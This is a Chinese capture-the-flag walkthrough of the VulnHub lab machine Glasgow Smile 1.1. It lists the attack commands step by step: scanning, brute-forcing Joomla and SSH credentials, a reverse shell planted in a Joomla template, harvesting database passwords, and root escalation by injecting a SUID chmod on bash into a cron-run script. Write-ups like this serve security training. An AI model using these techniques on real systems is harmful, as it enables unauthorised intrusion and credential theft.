OSCP难度靶机之Glasgow Smile:1.1

admin
admin
admin
138657
文章
114
评论
2022年11月21日18:27:25评论160 views字数 2107阅读7分1秒阅读模式
虚拟机下载地址:https://www.vulnhub.com/entry/glasgow-smile-11,491/
虚拟机简介:Glasgow Smile应该是 OSCP 机器的一种健身房
目标:4个flag
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Glasgow Smile:1.1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.147

查看开放22、80端口

OSCP难度靶机之Glasgow Smile:1.1

2、渗透测试

2.1 WEB渗透

1.站点信息收集

访问站点首页显示一个小丑微笑界面

OSCP难度靶机之Glasgow Smile:1.1

通过dirb进行目录扫描,发现存在joomla目录

dirb http://192.168.207.147

OSCP难度靶机之Glasgow Smile:1.1

访问站点显示CMS为joomla

OSCP难度靶机之Glasgow Smile:1.1

2.测试站点

使用joomscan进行扫描测试,检测版本为3.7.3rc1

joomscan --url http://192.168.207.147/joomla/

OSCP难度靶机之Glasgow Smile:1.1

使用cewl创建密码字典

cewl -m 5 http://192.168.207.147/joomla/ > pass.txt

OSCP难度靶机之Glasgow Smile:1.1

使用burpsuite进行密码爆破,获取到账号为joomla,密码为Gotham

OSCP难度靶机之Glasgow Smile:1.1

3.上传webshell

通过获取到的账号和密码登录成功,选择扩展---模板

OSCP难度靶机之Glasgow Smile:1.1

选择模板并把反弹shell填写到index.php中,并选择保存

OSCP难度靶机之Glasgow Smile:1.1

在扩展中选择模板,设置修改的模板为默认

OSCP难度靶机之Glasgow Smile:1.1

开启NC监听,并访问joomla首页,获取到反弹shell

nc -lnvp 4444

OSCP难度靶机之Glasgow Smile:1.1

2.2 主机渗透

1.查看数据库配置

初始化TTY配置

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

OSCP难度靶机之Glasgow Smile:1.1

根据joomla配置文件信息,获取到数据库账号和密码

cd /var/www/html/joomla
cat configuration.php

OSCP难度靶机之Glasgow Smile:1.1

登录数据库,查看数据库账号信息

mysql -u joomla -p
use batjoke;
select * from taskforce;

OSCP难度靶机之Glasgow Smile:1.1

保存密码内容并进行base64解码

for line in $(cat test); do echo $line | base64 -d ; echo "" ; done

OSCP难度靶机之Glasgow Smile:1.1

保存账号和解码后的密码通过hardy进行爆破到SSH账号和密码

hydra ssh://192.168.207.147 -L user.txt -P pass.txt

OSCP难度靶机之Glasgow Smile:1.1

2.第一个FLAG

通过爆破出来的账号和密码成功登录到主机

ssh [email protected]

OSCP难度靶机之Glasgow Smile:1.1

查看user.txt中获取到第一个FLAG

cat user.txt

OSCP难度靶机之Glasgow Smile:1.1

3.第二个FLAG

查看Abnerineedyourhelp文件

cat Abnerineedyourhelp

OSCP难度靶机之Glasgow Smile:1.1

通过CyberChef基于ROT13进行在线解密获取到账号和密码

OSCP难度靶机之Glasgow Smile:1.1

通过base64进行解码获取到密码

echo STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA== | base64 -d

OSCP难度靶机之Glasgow Smile:1.1

使用账号Abner和获取到的密码进行登录,获取到第二个FLAG

su - abner
cat user2.txt

OSCP难度靶机之Glasgow Smile:1.1

4.第三个FLAG

查看用户的历史命令,查看有一个压缩包文件

history

OSCP难度靶机之Glasgow Smile:1.1

查找压缩包文件,并复制到/tmp目录中进行解压

find / -print 2>/dev/null | grep -i ".dear_penguins.zip"

OSCP难度靶机之Glasgow Smile:1.1

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip /tmp
unzip .dear_penguins.zip

解压密码为abner账号的登录密码,I33hope99my0death000makes44more8cents00than0my0life0

OSCP难度靶机之Glasgow Smile:1.1

查看解压后的提示信息,提示账号和密码信息

cat dear_penguins

OSCP难度靶机之Glasgow Smile:1.1

使用账号和密码切换到penguin,在本地目录中获取到第三个FLAG

su - penguin
cd SomeoneWhoHidesBehindAMask
cat user3.txt

OSCP难度靶机之Glasgow Smile:1.1

5.查找可执行脚本

查看本地提示信息,说是正在开发一个以root身份启动的程序,开发完毕后会放在当前目录中

cat PeopleAreStartingToNotice.txt

OSCP难度靶机之Glasgow Smile:1.1

查看本地目录中有一个隐藏文件.trash_old

OSCP难度靶机之Glasgow Smile:1.1

通过pspy64进行监听发现该文件有定时任务

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod 777 pspy64
./pspy64

OSCP难度靶机之Glasgow Smile:1.1

6.获取Root下FLAG

修改文件内容并添加二进制文件suid权限

nano .trash_old

添加如下内容:
chmod u+s /usr/bin/bash

OSCP难度靶机之Glasgow Smile:1.1

等待一会儿后查看已经添加suid权限

ls -lah /usr/bin/bash
bash -p

OSCP难度靶机之Glasgow Smile:1.1

查看FLAG信息

cd /root
cat root.txt

OSCP难度靶机之Glasgow Smile:1.1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Glasgow Smile:1.1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月21日18:27:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Glasgow Smile:1.1https://cn-sec.com/archives/1420344.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息